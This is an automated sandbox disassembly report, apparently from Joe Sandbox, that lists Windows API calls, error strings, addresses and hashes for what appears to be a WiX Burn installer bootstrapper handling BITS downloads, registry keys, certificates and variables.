                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memcpy_s
                                                                                                                                                                    • String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
                                                                                                                                                                    • API String ID: 2001391462-1605196437
                                                                                                                                                                    • Opcode ID: 35eebc125da473d734e2c454a450d90beb650688b0021d3861a7391cd5ec1394
                                                                                                                                                                    • Instruction ID: 194f69b4dfc20c7e730be1982e51204b2f5a8f840aa99aec86aa327720b32453
                                                                                                                                                                    • Opcode Fuzzy Hash: 35eebc125da473d734e2c454a450d90beb650688b0021d3861a7391cd5ec1394
                                                                                                                                                                    • Instruction Fuzzy Hash: EE11E737681224BEEF252D6C9C8AE973A18EF96720F048551FD006A3D3C6B2C91097E1
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 00909E38
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed get file version., xrefs: 00909E78
                                                                                                                                                                    • File search: %ls, did not find path: %ls, xrefs: 00909EA3
                                                                                                                                                                    • Failed to set variable., xrefs: 00909E97
                                                                                                                                                                    • Failed to format path string., xrefs: 00909E43
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open@16
                                                                                                                                                                    • String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
                                                                                                                                                                    • API String ID: 3613110473-2458530209
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,00918E17,0000001A,00000000,?,00000000,00000000), ref: 00918258
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00918E17,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 00918262
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateCreateErrorKnownLastProcessWell
                                                                                                                                                                    • String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
                                                                                                                                                                    • API String ID: 2186923214-2110050797
                                                                                                                                                                    APIs
                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 0092DDCE
                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0092DDF8
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0092DFC8,00000000,?,?,?,?,00000000), ref: 0092DE00
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed while waiting for download., xrefs: 0092DE2E
                                                                                                                                                                    • bitsengine.cpp, xrefs: 0092DE24
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastMessageMultipleObjectsPeekWait
                                                                                                                                                                    • String ID: Failed while waiting for download.$bitsengine.cpp
                                                                                                                                                                    • API String ID: 435350009-228655868
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetComputerNameW.KERNEL32(?,00000010), ref: 00905F5C
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00905F66
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ComputerErrorLastName
                                                                                                                                                                    • String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
                                                                                                                                                                    • API String ID: 3560734967-484636765
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 009067E3
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009067ED
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastPathTemp
                                                                                                                                                                    • String ID: Failed to get temp path.$Failed to set variant value.$variable.cpp
                                                                                                                                                                    • API String ID: 1238063741-2915113195
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 00905EA6
                                                                                                                                                                      • Part of subcall function 00940ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00905EB2,00000000), ref: 00940AE0
                                                                                                                                                                      • Part of subcall function 00940ACC: GetProcAddress.KERNEL32(00000000), ref: 00940AE7
                                                                                                                                                                      • Part of subcall function 00940ACC: GetLastError.KERNEL32(?,?,?,00905EB2,00000000), ref: 00940AFE
                                                                                                                                                                      • Part of subcall function 00943D1F: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00943D4C
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to set variant value., xrefs: 00905F0A
                                                                                                                                                                    • variable.cpp, xrefs: 00905ED0
                                                                                                                                                                    • Failed to get shell folder., xrefs: 00905EDA
                                                                                                                                                                    • Failed to get 64-bit folder., xrefs: 00905EF0
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
                                                                                                                                                                    • String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
                                                                                                                                                                    • API String ID: 2084161155-3906113122
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00944440: FindFirstFileW.KERNEL32(0092923A,?,00000100,00000000,00000000), ref: 0094447B
                                                                                                                                                                      • Part of subcall function 00944440: FindClose.KERNEL32(00000000), ref: 00944487
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(0092923A,00000080,00000000,0092923A,000000FF,00000000,?,?,0092923A), ref: 00944182
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0092923A), ref: 0094418C
                                                                                                                                                                    • DeleteFileW.KERNEL32(0092923A,00000000,0092923A,000000FF,00000000,?,?,0092923A), ref: 009441AC
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0092923A), ref: 009441B6
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 3967264933-2967768451
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0092DA1A
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0092DA5F
                                                                                                                                                                    • SetEvent.KERNEL32(?,?,?,?), ref: 0092DA73
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failure while sending progress during BITS job modification., xrefs: 0092DA4E
                                                                                                                                                                    • Failed to get state during job modification., xrefs: 0092DA33
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                    • String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
                                                                                                                                                                    • API String ID: 3094578987-1258544340
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,0092DDEE), ref: 0092DC92
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000008,?,0092DDEE), ref: 0092DCD7
                                                                                                                                                                    • SetEvent.KERNEL32(?,?,0092DDEE), ref: 0092DCEB
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get BITS job state., xrefs: 0092DCAB
                                                                                                                                                                    • Failure while sending progress., xrefs: 0092DCC6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                    • String ID: Failed to get BITS job state.$Failure while sending progress.
                                                                                                                                                                    • API String ID: 3094578987-2876445054
                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,0092DF52,?,?,?,?,?,?,00000000,00000000), ref: 0092D802
                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0092DF52,?,?,?,?,?,?,00000000,00000000), ref: 0092D80D
                                                                                                                                                                    • GetLastError.KERNEL32(?,0092DF52,?,?,?,?,?,?,00000000,00000000), ref: 0092D81A
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to create BITS job complete event., xrefs: 0092D848
                                                                                                                                                                    • bitsengine.cpp, xrefs: 0092D83E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateCriticalErrorEventInitializeLastSection
                                                                                                                                                                    • String ID: Failed to create BITS job complete event.$bitsengine.cpp
                                                                                                                                                                    • API String ID: 3069647169-3441864216
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00917040,000000B8,00000000,?,00000000,75C0B390), ref: 0090D4B7
                                                                                                                                                                    • InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0090D4C6
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(000000D0,?,00917040,000000B8,00000000,?,00000000,75C0B390), ref: 0090D4DB
                                                                                                                                                                    Strings
                                                                                                                                                                    • userexperience.cpp, xrefs: 0090D4F4
                                                                                                                                                                    • Engine active cannot be changed because it was already in that state., xrefs: 0090D4FE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
                                                                                                                                                                    • String ID: Engine active cannot be changed because it was already in that state.$userexperience.cpp
                                                                                                                                                                    • API String ID: 3376869089-1544469594
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 00941CB3
                                                                                                                                                                    • GetLastError.KERNEL32(?,009049DA,00000001,?,?,00904551,?,?,?,?,00905466,?,?,?,?), ref: 00941CC2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                    • String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
                                                                                                                                                                    • API String ID: 199729137-398595594
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0093490E,00000000,?,009348AE,00000000,00967F08,0000000C,00934A05,00000000,00000002), ref: 0093497D
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00934990
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0093490E,00000000,?,009348AE,00000000,00967F08,0000000C,00934A05,00000000,00000002), ref: 009349B3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                    • Opcode ID: 3834420a4d843f09dc03fbe29a0085e5c519249cc08c66dece5641438bd1a369
                                                                                                                                                                    • Instruction ID: c99e5d9a7e93f1fb5d983f5bd777ace73055a98a148fb7d15270aeecdfa9daec
                                                                                                                                                                    • Opcode Fuzzy Hash: 3834420a4d843f09dc03fbe29a0085e5c519249cc08c66dece5641438bd1a369
                                                                                                                                                                    • Instruction Fuzzy Hash: 82F04F38A28218BBCB119FA1EC19BAEBFB8EB45B55F054069F805A2150CB719940DE95
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009193C9
                                                                                                                                                                      • Part of subcall function 009456CF: GetLastError.KERNEL32(?,?,0091933A,?,00000003,00000000,?), ref: 009456EE
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get certificate public key identifier., xrefs: 009193F7
                                                                                                                                                                    • Failed to read certificate thumbprint., xrefs: 009193BD
                                                                                                                                                                    • cache.cpp, xrefs: 009193ED
                                                                                                                                                                    • Failed to find expected public key in certificate chain., xrefs: 0091938A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                    • String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
                                                                                                                                                                    • API String ID: 1452528299-3408201827
                                                                                                                                                                    • Opcode ID: 0d143e627db3846f2416bc6416b78e90397385ad419bd709d3c7339ee20cdebb
                                                                                                                                                                    • Instruction ID: ee01dcc68e96accd6c19d123df2aa60847207c8a01e80768f9b10a61abebc2ae
                                                                                                                                                                    • Opcode Fuzzy Hash: 0d143e627db3846f2416bc6416b78e90397385ad419bd709d3c7339ee20cdebb
                                                                                                                                                                    • Instruction Fuzzy Hash: F9416D72F00219AFDB10DAA9D851EEEB7B8AB48710F014129FA15E7291D674ED41CBA0
                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 009021F2
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 009021FE
                                                                                                                                                                      • Part of subcall function 00903BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,009021CC,000001C7,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903BDB
                                                                                                                                                                      • Part of subcall function 00903BD3: HeapSize.KERNEL32(00000000,?,009021CC,000001C7,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903BE2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                                                    • String ID: strutil.cpp
                                                                                                                                                                    • API String ID: 3662877508-3612885251
                                                                                                                                                                    • Opcode ID: ca7e91daa0538d440e6e5dbcc56b0f3e2c6cea8f3ebcfb952186f555458dd530
                                                                                                                                                                    • Instruction ID: 5b4ac932d8d3c9668c60ce2e2f01067be19fee8bd440fc02512903880776a793
                                                                                                                                                                    • Opcode Fuzzy Hash: ca7e91daa0538d440e6e5dbcc56b0f3e2c6cea8f3ebcfb952186f555458dd530
                                                                                                                                                                    • Instruction Fuzzy Hash: 5131F53260522AAFDB288FEDCC4CA6A3B9DAF55774B214225FD259F2D0E671CC0097D0
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 009495D5
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 00949610
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 0094962C
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 00949639
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 00949646
                                                                                                                                                                      • Part of subcall function 00940FD5: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,009495C2,00000001), ref: 00940FED
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close$InfoOpenQuery
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 796878624-0
                                                                                                                                                                    • Opcode ID: 0887b28885dd4aef3395982a3be96aae5c71cf8d9e9df00391b34ac2128fcc7a
                                                                                                                                                                    • Instruction ID: 14bc0d8c30bdac64cf02ff171028abeba2fc7971aaad55f3089159d00cd10ff1
                                                                                                                                                                    • Opcode Fuzzy Hash: 0887b28885dd4aef3395982a3be96aae5c71cf8d9e9df00391b34ac2128fcc7a
                                                                                                                                                                    • Instruction Fuzzy Hash: 88412672C0122DFFCF22AF948D81DAEFAB9EF54754F1241AAEA1476121D7314E50AA90
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00908BC8,0090972D,?,0090972D,?,?,0090972D,?,?), ref: 00908A27
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00908BC8,0090972D,?,0090972D,?,?,0090972D,?,?), ref: 00908A2F
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,00908BC8,0090972D,?,0090972D,?), ref: 00908A7E
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00908BC8,0090972D,?,0090972D,?), ref: 00908AE0
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00908BC8,0090972D,?,0090972D,?), ref: 00908B0D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString$lstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1657112622-0
                                                                                                                                                                    • Opcode ID: 6a8b2707ab033323533dd8a13b89c8bb9dac3be10afc76c66fdd8f047456940a
                                                                                                                                                                    • Instruction ID: 7eedd98681f9fb0ffe8c918c31d1b1d0124e303e0ae73e8bf27611b3d208a9a8
                                                                                                                                                                    • Opcode Fuzzy Hash: 6a8b2707ab033323533dd8a13b89c8bb9dac3be10afc76c66fdd8f047456940a
                                                                                                                                                                    • Instruction Fuzzy Hash: E6318572B04118FFCF118F58CC89AAF3F6EEB49350F144416F98987590CA359D90DBA0
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(009053BD,WixBundleOriginalSource,?,?,0091A623,840F01E8,WixBundleOriginalSource,?,0096AA90,?,00000000,00905445,00000001,?,?,00905445), ref: 009074C3
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(009053BD,009053BD,00000000,00000000,?,?,0091A623,840F01E8,WixBundleOriginalSource,?,0096AA90,?,00000000,00905445,00000001,?), ref: 0090752A
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get value as string for variable: %ls, xrefs: 00907519
                                                                                                                                                                    • WixBundleOriginalSource, xrefs: 009074BF
                                                                                                                                                                    • Failed to get value of variable: %ls, xrefs: 009074FD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
                                                                                                                                                                    • API String ID: 3168844106-30613933
                                                                                                                                                                    • Opcode ID: f70db773cbd5aca1ff1e8ce14c08ec45b02a5c7b30e0fbea5cab65f928c5c194
                                                                                                                                                                    • Instruction ID: c6e3e633d54fb0b9d9bef5d527456f77358380835cd9758be9f6dde75f9b7dbf
                                                                                                                                                                    • Opcode Fuzzy Hash: f70db773cbd5aca1ff1e8ce14c08ec45b02a5c7b30e0fbea5cab65f928c5c194
                                                                                                                                                                    • Instruction Fuzzy Hash: 68019E32D48128EFCF219E94CC05E9EBA68EF05335F104161FD04A62A0C336AA11A7D0
                                                                                                                                                                    APIs
                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,?,00000000,?,0092D148,00000000), ref: 0092D16D
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0092D148,00000000), ref: 0092D179
